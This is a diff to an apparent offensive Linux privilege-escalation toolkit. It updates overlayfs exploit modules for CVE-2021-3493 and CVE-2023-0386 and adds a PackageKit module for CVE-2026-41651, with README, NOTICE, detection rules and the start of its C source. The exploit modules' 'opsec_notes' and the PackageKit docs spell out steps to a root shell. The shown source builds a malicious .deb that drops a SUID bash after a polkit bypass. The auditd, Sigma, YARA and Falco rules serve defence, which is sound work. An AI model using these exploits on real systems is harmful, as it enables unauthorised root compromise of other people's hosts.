@@ -129,10 +133,18 @@ static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)

    /* Ubuntu-specific bug. Non-Ubuntu kernels are largely immune
     * because upstream didn't enable the userns-mount path until
-     * 5.11. Bail early for non-Ubuntu. */
-    if (!is_ubuntu()) {
+     * 5.11. Bail early for non-Ubuntu. Consult the shared host
+     * fingerprint (distro_id == "ubuntu" — populated once at startup;
+     * the local is_ubuntu() helper is preserved for symmetry / future
+     * standalone use but the dispatcher path goes through ctx->host). */
+    bool ubuntu = ctx->host
+        ? (strcmp(ctx->host->distro_id, "ubuntu") == 0)
+        : is_ubuntu();
+    if (!ubuntu) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] overlayfs: not Ubuntu — bug is Ubuntu-specific\n");
+            fprintf(stderr, "[+] overlayfs: not Ubuntu (distro=%s) — bug is "
+                "Ubuntu-specific\n",
+                ctx->host ? ctx->host->distro_id : "?");
        }
        return SKELETONKEY_OK;
    }
@@ -180,7 +192,7 @@ static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)
     * Ubuntu fix is per-release-specific; conservatively report
     * VULNERABLE if version < 5.13 (covers most affected Ubuntu LTS),
     * and recommend --active for confirmation. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 13)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 13, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[!] overlayfs: Ubuntu kernel %s in vulnerable range — "
                            "re-run with --active to confirm\n", v.release);
@@ -446,6 +458,28 @@ fail_workdir:
    return SKELETONKEY_EXPLOIT_FAIL;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: overlayfs / unshare(CLONE_NEWUSER|CLONE_NEWNS) /
+ * setxattr("security.capability") are all Linux-only. Stub out so the
+ * module still registers and the top-level `make` completes on
+ * macOS/BSD dev boxes. */
+static skeletonkey_result_t overlayfs_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] overlayfs: Linux-only module "
+                "(Ubuntu userns-overlayfs) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] overlayfs: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+
+#endif /* __linux__ */
+
 /* ----- Embedded detection rules ----- */

 static const char overlayfs_auditd[] =
@@ -456,6 +490,56 @@ static const char overlayfs_auditd[] =
    "# Watch for security.capability xattr writes (the post-mount step)\n"
    "-a always,exit -F arch=b64 -S setxattr,fsetxattr,lsetxattr -k skeletonkey-overlayfs-cap\n";

+static const char overlayfs_sigma[] =
+    "title: Possible CVE-2021-3493 Ubuntu overlayfs capability injection\n"
+    "id: f78a01e6-skeletonkey-overlayfs\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects Ubuntu's overlayfs-in-userns capability-xattr injection:\n"
+    "  unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount('overlay') + setxattr\n"
+    "  with name 'security.capability'. The bug lets caps set inside\n"
+    "  userns persist on the host fs. False positives: legitimate\n"
+    "  rootless container image builds; correlate with subsequent\n"
+    "  execve of the modified binary.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:   {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  overlay:  {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  setcap:   {type: 'SYSCALL', syscall: 'setxattr'}\n"
+    "  condition: userns and overlay and setcap\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2021.3493]\n";
+
+static const char overlayfs_yara[] =
+    "rule overlayfs_cve_2021_3493 : cve_2021_3493 userns_lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2021-3493\"\n"
+    "        description = \"Ubuntu overlayfs userns workdir + security.capability xattr injection\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work    = /\\/tmp\\/skeletonkey-ovl-[A-Za-z0-9]+/\n"
+    "        $xattr   = \"security.capability\" ascii\n"
+    "    condition:\n"
+    "        $work and $xattr\n"
+    "}\n";
+
+static const char overlayfs_falco[] =
+    "- rule: overlayfs mount + setxattr(security.capability) in userns\n"
+    "  desc: |\n"
+    "    Non-root process inside userns mounts overlayfs and writes a\n"
+    "    security.capability xattr on a binary in the upper layer.\n"
+    "    The xattr persists on the host fs (CVE-2021-3493, Ubuntu).\n"
+    "    False positives: rootless container image builds.\n"
+    "  condition: >\n"
+    "    evt.type = setxattr and not user.uid = 0 and\n"
+    "    evt.args contains security.capability\n"
+    "  output: >\n"
+    "    setxattr(security.capability) by non-root\n"
+    "    (user=%user.name pid=%proc.pid file=%fd.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2021.3493]\n";
+
 const struct skeletonkey_module overlayfs_module = {
    .name           = "overlayfs",
    .cve            = "CVE-2021-3493",
@@ -468,9 +552,11 @@ const struct skeletonkey_module overlayfs_module = {
    .cleanup        = NULL,    /* exploit cleans up its own workdir on failure;
                                * on success, exec replaces us so cleanup-by-us doesn't apply */
    .detect_auditd  = overlayfs_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = overlayfs_sigma,
+    .detect_yara    = overlayfs_yara,
+    .detect_falco   = overlayfs_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) for CAP_SYS_ADMIN; mount('overlay', merged, ...); compile + copy payload into the merged dir (writes upper on host fs); setxattr(upper_payload, 'security.capability', cap_setuid+ep) - the bug is that this xattr persists on the HOST fs despite being set inside userns. Parent then execve's the now-CAP_SETUID payload, calls setuid(0), execs /bin/sh. Artifacts: /tmp/skeletonkey-ovl-XXXXXX/ workdir; cleaned on exit/failure (on success the exec replaces the process so cleanup does not run). Audit-visible via unshare + mount(overlay) + setxattr(security.capability) + execve of attacker-controlled binary. Dmesg silent.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_overlayfs(void)
@@ -40,14 +40,18 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include <stdint.h>
 #include <fcntl.h>
 #include <errno.h>
 #include <sched.h>
@@ -56,6 +60,7 @@
 #include <sys/wait.h>

 static const struct kernel_patched_from overlayfs_setuid_patched_branches[] = {
+    {5, 10, 179},   /* 5.10.x stable backport (per Debian tracker — bullseye) */
    {5, 15, 110},
    {6,  1,  27},
    {6,  2,  13},
@@ -68,18 +73,10 @@ static const struct kernel_range overlayfs_setuid_range = {
                      sizeof(overlayfs_setuid_patched_branches[0]),
 };

-static int can_unshare_userns_mount(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
+/* The unprivileged-userns precondition is now read from the shared
+ * host fingerprint (ctx->host->unprivileged_userns_allowed), which
+ * probes once at startup via core/host.c. The previous per-detect
+ * fork-probe helper was removed. */

 static const char *find_setuid_in_lower(void)
 {
@@ -98,39 +95,43 @@ static const char *find_setuid_in_lower(void)

 static skeletonkey_result_t overlayfs_setuid_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] overlayfs_setuid: could not parse kernel version\n");
+    /* Consult the shared host fingerprint instead of calling
+     * kernel_version_current() ourselves — populated once at startup
+     * and identical across every module's detect(). */
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json)
+            fprintf(stderr, "[!] overlayfs_setuid: host fingerprint missing kernel "
+                "version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.11 when ovl copy-up was generalized.
     * Pre-5.11 immune via a different code path. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 11)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 11, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: kernel %s predates the bug "
-                            "(introduced in 5.11)\n", v.release);
+                            "(introduced in 5.11)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&overlayfs_setuid_range, &v);
+    bool patched = kernel_range_is_patched(&overlayfs_setuid_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] overlayfs_setuid: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] overlayfs_setuid: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns_mount();
+    bool userns_ok = ctx->host ? ctx->host->unprivileged_userns_allowed : false;
    if (!ctx->json) {
-        fprintf(stderr, "[i] overlayfs_setuid: kernel %s in vulnerable range\n", v.release);
+        fprintf(stderr, "[i] overlayfs_setuid: kernel %s in vulnerable range\n", v->release);
        fprintf(stderr, "[i] overlayfs_setuid: user_ns+mount_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" : "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] overlayfs_setuid: user_ns denied → unprivileged exploit unreachable\n");
        }
@@ -197,7 +198,10 @@ static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ct
        fprintf(stderr, "[-] overlayfs_setuid: detect() says not vulnerable; refusing\n");
        return pre;
    }
-    if (geteuid() == 0) {
+    /* Consult ctx->host->is_root so unit tests can construct a
+     * non-root fingerprint regardless of the test process's real euid. */
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        fprintf(stderr, "[i] overlayfs_setuid: already root\n");
        return SKELETONKEY_OK;
    }
@@ -371,12 +375,88 @@ static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ct
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: overlayfs copy-up / unshare(CLONE_NEWUSER|CLONE_NEWNS)
+ * / mount("overlay", ...) are Linux-only. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t overlayfs_setuid_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] overlayfs_setuid: Linux-only module "
+                "(overlayfs setuid copy-up) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] overlayfs_setuid: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t overlayfs_setuid_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 static const char overlayfs_setuid_auditd[] =
    "# overlayfs setuid copy-up (CVE-2023-0386) — auditd detection rules\n"
    "# Same surface as CVE-2021-3493; share the skeletonkey-overlayfs key.\n"
    "-a always,exit -F arch=b64 -S mount -F a2=overlay -k skeletonkey-overlayfs\n"
    "-a always,exit -F arch=b64 -S chown,fchown,fchownat -k skeletonkey-overlayfs-chown\n";

+static const char overlayfs_setuid_sigma[] =
+    "title: Possible CVE-2023-0386 overlayfs setuid copy-up\n"
+    "id: 0891b2f7-skeletonkey-overlayfs-setuid\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the upstream overlayfs setuid copy-up bug: unshare\n"
+    "  (CLONE_NEWUSER|CLONE_NEWNS) + mount('overlay') with a setuid-\n"
+    "  root binary in lower + chown on the merged view to trigger\n"
+    "  copy-up. Setuid bit persists in upper layer despite\n"
+    "  unprivileged ownership.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  userns:    {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  overlay:   {type: 'SYSCALL', syscall: 'mount'}\n"
+    "  chown_up:  {type: 'SYSCALL', syscall: 'chown'}\n"
+    "  condition: userns and overlay and chown_up\n"
+    "level: critical\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0386]\n";
+
+static const char overlayfs_setuid_yara[] =
+    "rule overlayfs_setuid_cve_2023_0386 : cve_2023_0386 userns_lpe\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-0386\"\n"
+    "        description = \"overlayfs setuid copy-up workdir signature\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $work = /\\/tmp\\/skeletonkey-ovlsu-[A-Za-z0-9]+/\n"
+    "    condition:\n"
+    "        $work\n"
+    "}\n";
+
+static const char overlayfs_setuid_falco[] =
+    "- rule: overlayfs chown on setuid binary in userns (copy-up)\n"
+    "  desc: |\n"
+    "    Non-root chown on a setuid-root binary inside an overlayfs\n"
+    "    mount in a userns. Triggers copy-up that preserves the\n"
+    "    setuid bit despite unprivileged upper-layer ownership.\n"
+    "    CVE-2023-0386.\n"
+    "  condition: >\n"
+    "    evt.type in (chown, fchown, fchownat) and not user.uid = 0\n"
+    "    and (fd.name in (/usr/bin/su, /bin/su, /usr/bin/sudo,\n"
+    "                     /usr/bin/passwd, /usr/bin/pkexec)\n"
+    "         or fd.name endswith /su)\n"
+    "  output: >\n"
+    "    chown on setuid binary by non-root\n"
+    "    (user=%user.name pid=%proc.pid file=%fd.name)\n"
+    "  priority: CRITICAL\n"
+    "  tags: [filesystem, mitre_privilege_escalation, T1068, cve.2023.0386]\n";
+
 const struct skeletonkey_module overlayfs_setuid_module = {
    .name           = "overlayfs_setuid",
    .cve            = "CVE-2023-0386",
@@ -388,9 +468,11 @@ const struct skeletonkey_module overlayfs_setuid_module = {
    .mitigate       = NULL,
    .cleanup        = overlayfs_setuid_cleanup,
    .detect_auditd  = overlayfs_setuid_auditd,
-    .detect_sigma   = NULL,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_sigma   = overlayfs_setuid_sigma,
+    .detect_yara    = overlayfs_setuid_yara,
+    .detect_falco   = overlayfs_setuid_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNS) + overlayfs mount with a setuid-root binary in lower (e.g. /usr/bin/su); chown on the merged view triggers copy-up that preserves the setuid bit in upper - but upper is owned by the unprivileged user. Overwrites upper-layer contents with attacker payload and execve's for root. Artifacts: /tmp/skeletonkey-ovlsu-XXXXXX/ (workdir with payload.c, binary, overlay mounts); cleanup callback removes these. Audit-visible via unshare(CLONE_NEWUSER|CLONE_NEWNS) + mount(overlay) + chown on the merged view. No network. Dmesg silent on success.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_overlayfs_setuid(void)
@@ -0,0 +1,72 @@
+# pack2theroot — CVE-2026-41651
+
+> 🟡 **PRIMITIVE / ported.** Faithful port of the public Vozec PoC.
+> **Not yet validated end-to-end on a vulnerable host** — see
+> _Verification status_.
+
+## Summary
+
+Pack2TheRoot is a userspace LPE in the **PackageKit** daemon
+(`packagekitd`), the cross-distro package-management D-Bus abstraction
+layer shipped on virtually every desktop and most modern server Linux
+distros (Ubuntu, Debian, Fedora, Rocky/RHEL via Cockpit, openSUSE…).
+
+Three cooperating bugs in `src/pk-transaction.c` chain into a TOCTOU
+window between polkit authorisation and dispatch. **The exploit needs
+no GUI session, no special permissions, and no polkit prompt** —
+GLib's D-Bus-vs-idle priority ordering makes it deterministic, not a
+timing race.
+
+```
+1. InstallFiles(SIMULATE, dummy.deb)        ← polkit bypassed; idle queued
+2. InstallFiles(NONE,    payload.deb)        ← cached_flags overwritten
+3. GLib idle fires → pk_transaction_run()    ← reads payload.deb + NONE
+   → dpkg runs postinst as root → SUID bash → root shell
+```
+
+The payload `.deb` is built entirely in C inside the module
+(ar / ustar / gzip-stored, no external `dpkg-deb` dependency).
+
+## Operations
+
+| Op | Behaviour |
+|---|---|
+| `--scan` | Checks Debian/Ubuntu host, system D-Bus accessible, `org.freedesktop.PackageKit` registered, and reads `VersionMajor/Minor/Micro` from the daemon. Returns VULNERABLE only when the version falls in `1.0.2 ≤ V ≤ 1.3.4`. The fix release (1.3.5, commit `76cfb675`, 2026-04-22) is pinned. |
+| `--exploit … --i-know` | Builds the two `.deb`s in `/tmp`, fires the two `InstallFiles` D-Bus calls back-to-back, polls up to 120s for `/tmp/.suid_bash` to appear, then `execv`s it for an interactive root shell. `--no-shell` stops after the SUID bash lands. |
+| `--cleanup` | Removes the staged `.deb` files; best-effort `unlink(/tmp/.suid_bash)` (the file is root-owned — needs root to remove); best-effort `sudo -n dpkg -r` the installed staging packages. |
+| `--detect-rules` | Emits embedded auditd + sigma rules covering the file-side footprint (the D-Bus call itself isn't auditable without bus monitoring). |
+
+## Preconditions
+
+- Linux + Debian/Ubuntu (the PoC's built-in `.deb` builder is
+  Debian-family only; RHEL/Fedora ports would need an `.rpm` builder).
+- PackageKit daemon registered on the system bus.
+- PackageKit version in `[1.0.2, 1.3.4]`.
+- Module built with `libglib2.0-dev` available (the top-level Makefile
+  autodetects `gio-2.0` via `pkg-config`; the module compiles as a
+  stub returning `PRECOND_FAIL` when GLib is absent).
+
+## Side-effect notes
+
+The exploit installs a malicious `.deb` (registered in dpkg's database
+as `skeletonkey-p2tr-payload`) and drops `/tmp/.suid_bash`. Both are
+intentionally visible — this is an authorised-testing tool, not a
+covert toolkit. Run `--cleanup` (preferably as root) before leaving
+the host.
+
+## Verification status
+
+This module is a **faithful port** of
+<https://github.com/Vozec/CVE-2026-41651> into the SKELETONKEY module
+interface. It has **not** been validated end-to-end against a known-
+vulnerable PackageKit host inside the SKELETONKEY CI matrix.
+
+Unlike the page-cache modules, `detect()` here is high-confidence:
+the fix release is officially pinned and the version is read directly
+from the daemon over D-Bus, so a `VULNERABLE` verdict is grounded in
+upstream's own version metadata rather than a heuristic.
+
+**Before promoting to 🟢:** validate the trigger end-to-end on a
+Debian/Ubuntu host with PackageKit ≤ 1.3.4 (the Vozec repo ships a
+Dockerfile that builds PackageKit 1.3.4 from source — that is the
+recommended bench).
@@ -0,0 +1,53 @@
+# NOTICE — pack2theroot
+
+## Vulnerability
+
+**CVE-2026-41651** — Pack2TheRoot. PackageKit TOCTOU local privilege
+escalation in `src/pk-transaction.c`: two cooperating bugs allow
+`cached_transaction_flags` and `cached_full_paths` to be overwritten
+between polkit authorisation and dispatch, and a third bug causes the
+dispatcher to read those cached values at fire time rather than at
+authorisation time. GLib's D-Bus-vs-idle priority ordering makes the
+overwrite deterministic, not a timing race.
+
+CVSS 8.1. Affects PackageKit `1.0.2` through `1.3.4` (over a decade
+of releases). Fixed in **PackageKit 1.3.5** (upstream commit
+`76cfb675`, 2026-04-22).
+
+## Research credit
+
+Discovered and disclosed by the **Deutsche Telekom security team**.
+
+> Telekom advisory: <https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html>
+> Upstream advisory: <https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv>
+
+The standalone proof-of-concept exploit the SKELETONKEY module is
+ported from is by **Vozec**:
+
+> Reference PoC: <https://github.com/Vozec/CVE-2026-41651>
+
+The Vozec repository carries no `LICENSE` file at the time of porting;
+the SKELETONKEY-distributed `skeletonkey_modules.c` is original
+SKELETONKEY-licensed code (MIT) that reproduces the PoC's deb-builder
+(ar / ustar / gzip-stored) and D-Bus call sequence. Independent
+research credit belongs to the people above.
+
+A CTF-style lab by **dinosn** (Dockerised PackageKit 1.3.4 build with
+the exploit pre-set) is a useful reference bench:
+
+> CTF lab: <https://github.com/dinosn/pack2theroot-lab>
+
+## SKELETONKEY role
+
+`skeletonkey_modules.c` wraps the PoC in the standard
+`skeletonkey_module` detect / exploit / cleanup interface, adds the
+embedded auditd + sigma rules, and reads PackageKit's
+`VersionMajor/Minor/Micro` D-Bus properties so `detect()` can give a
+high-confidence verdict (the fix release 1.3.5 is officially pinned —
+no version-fabrication caveat).
+
+## Verification status
+
+**Ported, not yet validated end-to-end on a vulnerable host.** See
+`MODULE.md` for the recommended verification path (Vozec's Dockerised
+PackageKit-1.3.4 bench).
@@ -0,0 +1,28 @@
+# Pack2TheRoot (CVE-2026-41651) — auditd detection rules
+#
+# PackageKit TOCTOU LPE: two back-to-back InstallFiles D-Bus calls
+# install a malicious .deb as root, whose postinst drops a SUID bash
+# in /tmp. The D-Bus traffic itself is not auditable without bus
+# monitoring (dbus-monitor / dbus-broker logs), so these rules cover
+# the file-side footprint.
+#
+# Install: copy into /etc/audit/rules.d/ and `augenrules --load`, or
+#   skeletonkey --detect-rules --format=auditd | sudo tee \
+#     /etc/audit/rules.d/99-skeletonkey.rules
+
+# The exact SUID payload path the published PoC lands
+-w /tmp/.suid_bash -p wa -k skeletonkey-pack2theroot
+
+# Any setuid bit set on /tmp/.suid_bash by anyone
+-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat \
+    -F path=/tmp/.suid_bash -k skeletonkey-pack2theroot-suid
+
+# The PoC drops two .deb files in /tmp immediately before the install
+-a always,exit -F arch=b64 -S openat,creat \
+    -F dir=/tmp -F success=1 -k skeletonkey-pack2theroot-deb
+
+# packagekitd-driven dpkg/apt activity initiated by a non-root caller
+-a always,exit -F arch=b64 -S execve -F path=/usr/bin/dpkg \
+    -F auid!=0 -k skeletonkey-pack2theroot-dpkg
+-a always,exit -F arch=b64 -S execve -F path=/usr/bin/apt-get \
+    -F auid!=0 -k skeletonkey-pack2theroot-apt
@@ -0,0 +1,32 @@
+title: Possible Pack2TheRoot exploitation (CVE-2026-41651)
+id: 3f2b8d54-skeletonkey-pack2theroot
+status: experimental
+description: |
+  Detects the file-side footprint of Pack2TheRoot (CVE-2026-41651): a
+  non-root user triggers PackageKit InstallFiles, dpkg runs a postinst
+  that drops /tmp/.suid_bash (a setuid bash), and a privileged shell
+  follows. The trigger itself is two back-to-back D-Bus calls with no
+  polkit prompt — only visible via dbus-monitor or the file side
+  effects flagged below.
+references:
+  - https://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html
+  - https://github.com/PackageKit/PackageKit/security/advisories/GHSA-f55j-vvr9-69xv
+  - https://github.com/Vozec/CVE-2026-41651
+logsource:
+  product: linux
+  service: auditd
+detection:
+  suid_drop:
+    type: 'PATH'
+    name|startswith:
+      - '/tmp/.suid_bash'
+      - '/tmp/.pk-payload-'
+      - '/tmp/.pk-dummy-'
+  not_root:
+    auid|expression: '!= 0'
+  condition: suid_drop and not_root
+level: high
+tags:
+  - attack.privilege_escalation
+  - attack.t1068
+  - cve.2026.41651
@@ -0,0 +1,800 @@
+/*
+ * pack2theroot_cve_2026_41651 — SKELETONKEY module
+ *
+ * Pack2TheRoot (CVE-2026-41651) — PackageKit TOCTOU LPE.
+ *
+ * Three cooperating bugs in PackageKit's `src/pk-transaction.c`:
+ *   BUG 1  InstallFiles() stores cached_transaction_flags and
+ *          cached_full_paths unconditionally, with no state guard.
+ *   BUG 2  pk_transaction_set_state() silently rejects backward
+ *          transitions (READY → WAITING_FOR_AUTH).
+ *   BUG 3  pk_transaction_run() reads the cached flags at dispatch
+ *          time, not at authorisation time.
+ *   BYPASS The SIMULATE flag skips polkit entirely.
+ *
+ * Two back-to-back async D-Bus InstallFiles() calls — first with
+ * SIMULATE (bypasses polkit, queues a GLib idle callback), then
+ * immediately with NONE + the malicious .deb (overwrites the cached
+ * flags/paths before the idle fires). GLib priority ordering makes
+ * this deterministic, not a timing race. postinst of the malicious
+ * .deb installs a SUID bash at /tmp/.suid_bash → root shell.
+ *
+ * This module is a faithful port of the public PoC by Vozec
+ * (github.com/Vozec/CVE-2026-41651); the deb-builder helpers
+ * (CRC-32, gzip-stored, tar entry, ar entry, build_deb) and the
+ * D-Bus call sequence are reproduced from that PoC. The original
+ * disclosure was by the Deutsche Telekom security team. See
+ * NOTICE.md.
+ *
+ * Build adaptation: the module requires GLib/GIO for D-Bus. The
+ * top-level Makefile autodetects gio-2.0 via pkg-config and defines
+ * PACK2TR_HAVE_GIO when present. When absent, the module compiles as
+ * a stub that returns PRECOND_FAIL with a build-time hint.
+ *
+ * Port adaptations vs. the standalone PoC:
+ *   - wrapped in the skeletonkey_module detect/exploit/cleanup interface
+ *   - exploit() runs the PoC body in a forked child so the PoC's
+ *     die()/exit() paths cannot tear down the skeletonkey dispatcher
+ *   - detect() does a passive precondition + version check (vulnerable
+ *     range 1.0.2 ≤ V ≤ 1.3.4, fixed in 1.3.5) — no version-only
+ *     fabrication; the fix release is officially pinned
+ *   - honours ctx->no_shell (build + fire the TOCTOU, do not spawn
+ *     the SUID bash shell)
+ *   - cleanup() removes the two /tmp .debs and best-effort-unlinks
+ *     /tmp/.suid_bash (which requires root since it is owned by root)
+ *
+ * VERIFICATION STATUS: ported, NOT yet validated end-to-end on a
+ * vulnerable PackageKit (1.3.4 or earlier) host. The fix release
+ * (1.3.5, commit 76cfb675, 2026-04-22) IS pinned.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#include <unistd.h>
+
+#if defined(__linux__) && defined(PACK2TR_HAVE_GIO)
+
+/* _GNU_SOURCE / _FILE_OFFSET_BITS are passed via -D in the top-level
+ * Makefile; do not redefine here. */
+#include "../../core/host.h"
+#include <stdint.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <sys/file.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <time.h>
+#include <glib.h>
+#include <gio/gio.h>
+
+/* ── config ────────────────────────────────────────────────────────── */
+#define SUID_PATH     "/tmp/.suid_bash"
+#define PK_BUS        "org.freedesktop.PackageKit"
+#define PK_OBJ        "/org/freedesktop/PackageKit"
+#define PK_IFACE      "org.freedesktop.PackageKit"
+#define PK_TX_IFACE   "org.freedesktop.PackageKit.Transaction"
+#define FLAG_NONE     ((guint64)0)
+#define FLAG_SIMULATE ((guint64)(1u << 2))   /* SIMULATE bypasses polkit */
+
+/* Vulnerable range: PackageKit 1.0.2 ≤ V ≤ 1.3.4. Fixed in 1.3.5. */
+#define P2TR_VER(M,m,p) ((M)*10000 + (m)*100 + (p))
+#define P2TR_VER_LO     P2TR_VER(1,0,2)
+#define P2TR_VER_HI     P2TR_VER(1,3,4)
+
+static int p2tr_verbose = 1;
+#define LOG(fmt, ...) do { if (p2tr_verbose) \
+	fprintf(stderr, "[*] pack2theroot: " fmt "\n", ##__VA_ARGS__); } while (0)
+#define ERR(fmt, ...) fprintf(stderr, "[-] pack2theroot: " fmt "\n", ##__VA_ARGS__)
+
+/* ── CRC-32 (ISO 3309) — verbatim from V12 PoC ─────────────────────── */
+static uint32_t crc_tab[256];
+static void crc_init(void)
+{
+	for (unsigned i = 0; i < 256; i++) {
+		uint32_t c = i;
+		for (int j = 0; j < 8; j++) c = (c&1) ? (0xedb88320u ^ (c>>1)) : (c>>1);
+		crc_tab[i] = c;
+	}
+}
+static uint32_t crc32_iso(const void *src, size_t n)
+{
+	const uint8_t *p = src; uint32_t c = 0xffffffffu;
+	while (n--) c = crc_tab[(c ^ *p++) & 0xff] ^ (c >> 8);
+	return c ^ 0xffffffffu;
+}
+
+/* ── gzip stored deflate block (max 65535 B) ───────────────────────── */
+static size_t gzip_store(const void *src, size_t len, uint8_t *dst)
+{
+	if (len > 0xffff) return 0;
+	uint8_t *p = dst;
+	*p++ = 0x1f; *p++ = 0x8b; *p++ = 0x08; *p++ = 0x00;
+	p[0]=p[1]=p[2]=p[3]=0; p+=4; *p++ = 0x00; *p++ = 0xff;
+	uint16_t ln = len, nln = ~ln;
+	*p++ = 0x01; memcpy(p, &ln, 2); p += 2; memcpy(p, &nln, 2); p += 2;
+	memcpy(p, src, len); p += len;
+	uint32_t c = crc32_iso(src, len), s = (uint32_t)len;
+	memcpy(p, &c, 4); p += 4; memcpy(p, &s, 4); p += 4;
+	return p - dst;
+}
+
+/* ── ustar tar entry ───────────────────────────────────────────────── */
+static size_t tar_entry(uint8_t *buf, const char *name, const void *data,
+			size_t dlen, mode_t mode, char type)
+{
+	memset(buf, 0, 512);
+	snprintf((char *)buf,     100, "%s", name);
+	snprintf((char *)buf+100,   8, "%07o", (unsigned)mode);
+	snprintf((char *)buf+108,   8, "%07o", 0u);
+	snprintf((char *)buf+116,   8, "%07o", 0u);
+	snprintf((char *)buf+124,  12, "%011o", (unsigned)dlen);
+	snprintf((char *)buf+136,  12, "%011o", (unsigned)time(NULL));
+	memset(buf+148, ' ', 8);
+	buf[156] = type;
+	memcpy(buf+257, "ustar", 5); memcpy(buf+263, "00", 2);
+	unsigned sum = 0; for (int i = 0; i < 512; i++) sum += buf[i];
+	snprintf((char *)buf+148, 8, "%06o", sum);
+	buf[154] = '\0'; buf[155] = ' ';
+	size_t pad = dlen ? ((dlen + 511) / 512) * 512 : 0;
+	if (dlen && data) memcpy(buf + 512, data, dlen);
+	if (pad > dlen)   memset(buf + 512 + dlen, 0, pad - dlen);
+	return 512 + pad;
+}
+
